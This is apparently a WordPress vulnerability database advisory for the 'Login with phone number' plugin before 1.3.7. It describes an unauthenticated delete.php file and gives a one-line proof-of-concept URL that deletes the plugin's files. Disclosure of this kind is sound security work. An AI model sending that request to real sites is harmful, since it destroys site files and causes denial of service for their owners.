WordPress Plugin Vulnerabilities
Login with phone number < 1.3.7 - Unauthenticated remote plugin deletion
Description
The plugin includes a file delete.php with no form of authentication or authorization checks placed in the plugin directory, allowing unauthenticated user to remotely delete the plugin files leading to a potential Denial of Service situation.
Proof of Concept
http://example/wp-content/plugins/login-with-phone-number/delete.php?delete=1
Affects Plugins
References
Classification
Type
FILE DELETION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Michal Lipinski
Submitter
Michal Lipinski
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-02-16 (about 2 years ago)
Added
2022-02-16 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)